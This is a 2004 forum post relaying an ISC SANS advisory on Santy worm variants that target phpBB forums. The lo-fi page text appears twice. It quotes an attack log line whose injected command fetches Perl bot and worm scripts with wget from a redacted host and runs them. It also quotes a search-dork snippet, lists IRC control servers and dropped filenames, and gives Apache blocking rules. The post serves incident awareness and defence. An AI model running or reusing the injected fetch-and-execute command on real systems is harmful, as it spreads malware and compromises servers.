Santy.b;santy.c; Santy.?

GovernmentSecurity.org > System Security > Trojan & Virus Errata

Rigpa

Dec 25 2004, 11:00 PM

Santy.b;Santy.c; New variants are being detected and the codes made public on k-otic:

from isc.sans.org

We are putting this up early because we have been receiving several reports on a possible Santy variant worm. It is however quite different from the original Santy worm.

It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submission we received. Others are quite similar.

"GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp;
wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt;
wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt;
wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;
perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"

You can see that the files pull off include:
spy.gif (which contains a script)
spybot.txt
worm1.txt
php.txt
ownz.txt
zone.txt

worm1.txt is a perl script which attempts to search using Google/Yahoo for vulnerable system.

$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";

spybot.txt is another perl script which attempts to set up an irc channel to irc.gigachat.net:6667.

From other piece of logs submitted, we have IRC server as:

ssh.gigachat.net
leaf-sunwave.animirc.net
eu.undernet.org
irc.efnet.net

Note that the above filenames changes depending on which hosts it is trying to wget. Other filenames include:
adfkgnnodfijg
bot
bot.txt
bot.txt.1
dry.scp
ssh.a
terrorbot.txt
terrorbot.txt.1
terrorworm.txt
terrorworm.txt.1
unbot.txt
unbot.txt.1
unbot.txt.2
unbot.txt.3
unworm.txt
unworm.txt.1
unworm.txt.2
unworm.txt.3
worm1.txt
worm.txt
worm.txt.1

One of our readers has blocked this attack with apache conf directives as such:

SetEnvIf User-Agent "LWP::" get_lost
SetEnvIf User-Agent "lwp-trivial" get_lost
<Directory /usr/local/apache/htdocs/your_phpdirectory>
Order Allow,Deny
Deny from env=get_lost
Allow from all
</Directory>

K-Otik has published a copy that uses AOL/Yahoo search instead.

see also k-otik.com

and k-otik.com Santy.C

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.


Help - Search - Member List - Calendar Full Version: Santy.b;santy.c; Santy.? GovernmentSecurity.org > System Security > Trojan & Virus Errata Rigpa Dec 25 2004, 11:00 PM Santy.b;Santy.c; New variants are being detected and the codes made public on k-otic: from isc.sans.org We are putting this up early because we have been receiving several reports on a possible Santy variant worm. It is however quite different from the original Santy worm. It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submission we received. Others are quite similar. "GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp; wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt; wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt; wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt; perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803" You can see that the files pull off include: spy.gif (which contains a script) spybot.txt worm1.txt php.txt ownz.txt zone.txt worm1.txt is a perl script which attempts to search using Google/Yahoo for vulnerable system. $site = "www.google.com"; $procura = "inurl:viewtopic.php?t=$numero"; spybot.txt is another perl script which attempts to set up an irc channel to irc.gigachat.net:6667. From other piece of logs submitted, we have IRC server as: ssh.gigachat.net leaf-sunwave.animirc.net eu.undernet.org irc.efnet.net Note that the above filenames changes depending on which hosts it is trying to wget. Other filenames include: adfkgnnodfijg bot bot.txt bot.txt.1 dry.scp ssh.a terrorbot.txt terrorbot.txt.1 terrorworm.txt terrorworm.txt.1 unbot.txt unbot.txt.1 unbot.txt.2 unbot.txt.3 unworm.txt unworm.txt.1 unworm.txt.2 unworm.txt.3 worm1.txt worm.txt worm.txt.1 One of our readers has blocked this attack with apache conf directives as such: SetEnvIf User-Agent "LWP::" get_lost SetEnvIf User-Agent "lwp-trivial" get_lost <Directory /usr/local/apache/htdocs/your_phpdirectory> Order Allow,Deny Deny from env=get_lost Allow from all </Directory> K-Otik has published a copy that uses AOL/Yahoo search instead. see also k-otik.com and k-otik.com Santy.C This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.